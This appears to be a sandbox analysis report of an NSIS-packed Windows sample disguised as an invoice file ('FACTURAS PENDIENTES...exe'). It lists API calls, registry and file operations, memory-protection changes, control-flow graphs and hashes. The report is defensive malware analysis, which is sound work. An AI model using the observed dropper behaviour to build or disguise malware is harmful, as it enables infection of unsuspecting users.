4032c1-4032c3 1102->1108 1104 4032d7-4032de 1103->1104 1104->1085 1107 4032e4 1104->1107 1107->1073 1108->1090 1109 4032c5-4032c9 1108->1109 1109->1104
                                APIs
                                • GetTickCount.KERNEL32 ref: 004031B6
                                • GetTickCount.KERNEL32 ref: 00403245
                                • MulDiv.KERNEL32(?,00000064,?), ref: 00403275
                                • wsprintfW.USER32 ref: 00403286
                                  • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CountTick$FilePointerwsprintf
                                • String ID: ... %d%%
                                • API String ID: 999035486-2449383134

                                Control-flow Graph

                                control_flow_graph 1110 40141e-401456 call 4062b3 1112 40145b-40145d 1110->1112 1113 401463-40146d 1112->1113 1114 401527-401530 1112->1114 1115 401493-4014a4 1113->1115 1116 40146f-401491 RegEnumValueW 1113->1116 1118 4014ce-4014d6 RegEnumKeyW 1115->1118 1116->1115 1117 401503-401512 RegCloseKey 1116->1117 1117->1114 1119 4014a6-4014a8 1118->1119 1120 4014d8-4014eb RegCloseKey call 4068c1 1118->1120 1119->1117 1122 4014aa-4014c1 call 40141e 1119->1122 1125 401514-40151e 1120->1125 1126 4014ed-401501 RegDeleteKeyW 1120->1126 1122->1120 1128 4014c3-4014cd 1122->1128 1125->1114 1126->1114 1128->1118
                                APIs
                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                • RegCloseKey.ADVAPI32(?), ref: 00401507
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CloseEnum$DeleteValue
                                • String ID:
                                • API String ID: 1354259210-0

                                Control-flow Graph

                                control_flow_graph 1129 40225d-402268 1130 40233e-402343 1129->1130 1131 40226e-402289 call 40303e * 2 1129->1131 1132 402345-40234a call 405d15 1130->1132 1141 40228b-402296 GetModuleHandleW 1131->1141 1142 40229c-4022aa LoadLibraryExW 1131->1142 1138 402ea5-402eb7 1132->1138 1144 4022b0-4022c2 call 406244 1141->1144 1145 402298 1141->1145 1142->1144 1146 402335-40233c 1142->1146 1149 4022c4-4022ca 1144->1149 1150 402306-40230c call 405d15 1144->1150 1145->1142 1146->1132 1151 4022e6-402304 1149->1151 1152 4022cc-4022e0 call 405d15 1149->1152 1155 402311-402315 1150->1155 1151->1155 1152->1155 1162 4022e2-4022e4 1152->1162 1155->1138 1158 40231b-402323 call 403cb1 1155->1158 1158->1138 1163 402329-402330 FreeLibrary 1158->1163 1162->1155 1163->1138
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040228C
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                  • Part of subcall function 00405D15: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                  • Part of subcall function 00405D15: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll), ref: 00405D8C
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432), ref: 00405DB3
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432,0000104D,00000000,?), ref: 00405DCE
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432,00001013,00000000,00000000), ref: 00405DDB
                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004022A0
                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                • String ID: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                • API String ID: 334405425-2928134256
                                APIs
                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscDCA5.tmp,00000023,?,00000011,00000002), ref: 004026C3
                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscDCA5.tmp,?,?,00000011,00000002), ref: 00402710
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscDCA5.tmp,?,?,00000011,00000002), ref: 0040271D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CloseValuelstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp
                                • API String ID: 2655323295-492680522
                                APIs
                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                • GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                  • Part of subcall function 00406179: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                  • Part of subcall function 00406179: wsprintfW.USER32 ref: 004061CC
                                  • Part of subcall function 00406179: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                • API String ID: 2547128583-890815371
                                APIs
                                • CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405E5A
                                • GetLastError.KERNEL32 ref: 00405E64
                                • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405E7D
                                • GetLastError.KERNEL32 ref: 00405E8B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                • String ID:
                                • API String ID: 3449924974-0
                                APIs
                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,00000002,00405F99), ref: 00406999
                                • RegCloseKey.KERNELBASE(?), ref: 004069A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID: Call
                                • API String ID: 3356406503-1824292864
                                APIs
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Tolkningen Setup,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406BA0: CharNextW.USER32(?,?,?,00000000,00425A48,0040662A,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406BAF
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BB4
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BCE
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                • lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406667
                                • GetFileAttributesW.KERNELBASE(00425A48,00425A48), ref: 00406678
                                  • Part of subcall function 004065AA: FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                  • Part of subcall function 004065AA: FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                • String ID: HZB
                                • API String ID: 1879705256-1498320904
                                APIs
                                • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00405E01
                                • GetLastError.KERNEL32 ref: 00405E0B
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CreateDirectoryErrorLast
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 1375471231-823278215
                                • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                • Instruction ID: 45d9b0881c8677af27f94d707b600064aa91ade8dc0fdf8d2bf4d46db956c495
                                • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                • Instruction Fuzzy Hash: 15C012316000309BC7601B65AE089477E94DB547A13064639B988E1110D6304C5486D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                • Instruction ID: 522defa19930b26a7af3553485d7a536a03fd017600a111de47fbc571b524dd9
                                • Opcode Fuzzy Hash: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                • Instruction Fuzzy Hash: 4B913371A0C3818BE364CF29C480B6BBBE1AFC9344F10892EE5D997390E774A805CB57
                                APIs
                                  • Part of subcall function 6FA42351: GlobalFree.KERNEL32(?), ref: 6FA42A44
                                  • Part of subcall function 6FA42351: GlobalFree.KERNEL32(?), ref: 6FA42A4A
                                  • Part of subcall function 6FA42351: GlobalFree.KERNEL32(?), ref: 6FA42A50
                                • GlobalFree.KERNEL32(00000000), ref: 6FA41738
                                • FreeLibrary.KERNEL32(?), ref: 6FA417C3
                                • GlobalFree.KERNEL32(00000000), ref: 6FA417E9
                                  • Part of subcall function 6FA41FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6FA41FFA
                                  • Part of subcall function 6FA417F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6FA41708,00000000), ref: 6FA4189A
                                  • Part of subcall function 6FA41F1E: wsprintfW.USER32 ref: 6FA41F51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmp
                                Similarity
                                • API ID: Global$Free$Alloc$Librarywsprintf
                                • String ID:
                                • API String ID: 3962662361-0
                                • Opcode ID: 7d10fe57d473f3fad9c7105ca2f88e2887ad66130f33ce5399e9f535f0bdcb45
                                • Instruction ID: 2b10a6fae63458f217ddec816cb7ec1950f428a7ecac03a4f636ff15286618eb
                                • Opcode Fuzzy Hash: 7d10fe57d473f3fad9c7105ca2f88e2887ad66130f33ce5399e9f535f0bdcb45
                                • Instruction Fuzzy Hash: 4541E735400348AFDB629F28D944BEA37F8BB41325F04401AFD5D8A1C2EB7DA5E9CA55
                                APIs
                                • GlobalFree.KERNEL32(006346B0), ref: 00401D81
                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401D93
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Global$AllocFreelstrcat
                                • String ID: Call
                                • API String ID: 238967769-1824292864
                                • Opcode ID: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                • Instruction ID: 3a6eff4e9616495b68701e132b411bef72aa922240f6375a3907340b29510e26
                                • Opcode Fuzzy Hash: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                • Instruction Fuzzy Hash: 7111DF72A12310EBD720AF54DD80A2B73A8FF45718B05443FF946B72D1D738A8109BAE
                                APIs
                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
                                • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Enum$CloseValue
                                • String ID:
                                • API String ID: 397863658-0
                                • Opcode ID: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                • Instruction ID: 511bfc2a391466f7e6c467a51680e698ffc79b74a509a4b58bb4b7d47538cca8
                                • Opcode Fuzzy Hash: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                • Instruction Fuzzy Hash: 8D01B531658341ABD3189F61ED88D3BB79CFF85315F11093EF542A2180D7B86904866A
                                APIs
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscDCA5.tmp,?,?,00000011,00000002), ref: 0040271D
                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040275E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID:
                                • API String ID: 3356406503-0
                                • Opcode ID: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                • Instruction ID: 691293788ab813f7a02a0c784ea8aced05bc34a113cec979fc9dae3080cb0c68
                                • Opcode Fuzzy Hash: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                • Instruction Fuzzy Hash: 4911A035658302AED7548FA4DA88A2BB3A4EF84315F10053FF142A21D1D7B85909CB5B
                                APIs
                                • MulDiv.KERNEL32(00000011,00007530,00000000), ref: 004013F9
                                • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 4a227ca3b38513ddfb18d8d58b55d7f5df30190cf1bb37be781ef323b2e94d58
                                • Instruction ID: e1306000d3193007dcaf3fb318de5d2d5eb9708196255911654f78f844dcab6e
                                • Opcode Fuzzy Hash: 4a227ca3b38513ddfb18d8d58b55d7f5df30190cf1bb37be781ef323b2e94d58
                                • Instruction Fuzzy Hash: CB01D472B152309BD7296F2DEC09B2B2699A780711F55453EF901F72F1DBB89C02875C
                                APIs
                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
                                • RegCloseKey.ADVAPI32(00000000), ref: 00402627
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CloseDeleteValue
                                • String ID:
                                • API String ID: 2831762973-0
                                • Opcode ID: 5b58f1ccd0e981fc5f0d95379a17638c192d39fce6d665bfeee0e3d77dcbd03f
                                • Instruction ID: 38e38bfe0db84342a76dd61cbaa190e5b367477f23a550be25d98ac167cb56e2
                                • Opcode Fuzzy Hash: 5b58f1ccd0e981fc5f0d95379a17638c192d39fce6d665bfeee0e3d77dcbd03f
                                • Instruction Fuzzy Hash: D5F02433645600A7E310ABA49D4AA7E765DAF903A2F11053FF642A61C4CE7E8C46862D
                                APIs
                                • GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: File$AttributesCreate
                                • String ID:
                                • API String ID: 415043291-0
                                • Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                • Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
                                • Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                • Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402B11
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: e18c58a2aa738140e54549e427365221eafe551e17cff140cde306a09a17fb3e
                                • Instruction ID: b4aa691efdd76b97e29f232bcdca97d183a91086d161f739a0adeab6622ebcbf
                                • Opcode Fuzzy Hash: e18c58a2aa738140e54549e427365221eafe551e17cff140cde306a09a17fb3e
                                • Instruction Fuzzy Hash: F8E04F726452006FE610AB51ED8AD7FB71CEB81319F14483FF544A40C1C67E6855966A
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 0040693A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                • Instruction ID: 2742144f5a26ad2eb6f685a055c8babc8a1130b1cd91e66bb9562d29751e6569
                                • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                • Instruction Fuzzy Hash: 7CE0BF72200119BB8F215B46DD04D9FBF6DEE956A47114026B905A6150D670EA11D6E4
                                APIs
                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,004149C0,00403323,?,004149C0,?,004149C0,?,00000004), ref: 004069FD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                APIs
                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062A9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                APIs
                                • VirtualProtect.KERNELBASE(6FA4501C,00000004,00000040,6FA45034), ref: 6FA41A68
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,00406980,00000800,?,?,?,Call,00000000,00000000), ref: 004062D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                APIs
                                • SendMessageW.USER32(0001042C,00000000,00000000,00000000), ref: 004054D5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                APIs
                                • SendMessageW.USER32(00000028,?,?,00405313), ref: 004054EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                APIs
                                • VirtualAlloc.KERNELBASE(?), ref: 6FA42DD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404411
                                • GetDlgItem.USER32(?,00000408), ref: 0040441D
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404465
                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 0040447E
                                • SetWindowLongW.USER32(00000000,000000FC,Function_000058AB), ref: 00404495
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004044AB
                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044BD
                                • SendMessageW.USER32(00000000,00001109,00000002), ref: 004044D0
                                • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 004044DC
                                • SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 004044EE
                                • DeleteObject.GDI32(00000000), ref: 004044F1
                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040451F
                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404529
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004045D4
                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 004045FE
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404614
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404643
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404650
                                • ShowWindow.USER32(?,00000005), ref: 00404664
                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047A1
                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040481C
                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483B
                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404867
                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040489C
                                • ImageList_Destroy.COMCTL32(00000000), ref: 004048C3
                                • GlobalFree.KERNEL32(00000000), ref: 004048D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                • String ID: >5^$M
                                • API String ID: 1688767230-2153850456
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 004040B1
                                • SetWindowTextW.USER32(00000000,?), ref: 004040DB
                                  • Part of subcall function 00406A15: GetDlgItemTextW.USER32(?,?,00000400,00404F27), ref: 00406A28
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Char$Next$ItemText$PrevWindow
                                • String ID: >5^$A$C:\Users\user\AppData\Local\Temp\fanin$Call
                                • API String ID: 4089110348-3098483820
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
